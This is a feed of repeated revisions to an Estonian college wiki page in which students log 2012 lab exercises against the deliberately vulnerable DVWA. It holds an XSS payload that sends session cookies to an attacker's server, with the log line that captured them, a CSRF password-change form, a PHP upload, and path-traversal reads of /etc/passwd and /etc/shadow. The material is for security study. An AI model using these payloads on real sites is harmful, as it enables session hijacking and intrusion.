&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
    Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
    Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
    ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
    data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
    http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
&lt;br /&gt;
== 4. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno&amp;lt;br&amp;gt;&lt;br /&gt;
Urmo Lihten&amp;lt;br&amp;gt;&lt;br /&gt;
Taavi Podžuks&amp;lt;br&amp;gt;&lt;br /&gt;
Matis Alliksoo&amp;lt;br&amp;gt;&lt;br /&gt;
Sander Saarm&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=46840</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=46840"/>
		<updated>2012-03-28T11:41:13Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* Reflected Cross Site Scripting (XSS) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidga tutvumine ==&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce.&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud - selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse ja selleks panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada, siis oli päringute tegemise kiirus vähem kui 1päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;Xsstesting.jpg&amp;quot;/&amp;gt;&lt;br /&gt;
Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
    /var/log/apache2/access.log&lt;br /&gt;
    127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot;                  &amp;lt;br&amp;gt;  &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
    Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
        &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas&lt;br /&gt;
    http://dvwa/hackable/uploads/*.php&lt;br /&gt;
käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
    esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
    teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
        &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
    Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
    Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
    Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
    ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
    data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
    http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
&lt;br /&gt;
== 4. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno&amp;lt;br&amp;gt;&lt;br /&gt;
Urmo Lihten&amp;lt;br&amp;gt;&lt;br /&gt;
Taavi Podžuks&amp;lt;br&amp;gt;&lt;br /&gt;
Matis Alliksoo&amp;lt;br&amp;gt;&lt;br /&gt;
Sander Saarm&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=46839</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=46839"/>
		<updated>2012-03-28T11:38:02Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* Reflected Cross Site Scripting (XSS) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidga tutvumine ==&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce.&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud - selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse ja selleks panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada, siis oli päringute tegemise kiirus vähem kui 1päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;Xsstesting.jpg&amp;quot;/&amp;gt;&lt;br /&gt;
Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;&lt;br /&gt;
alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
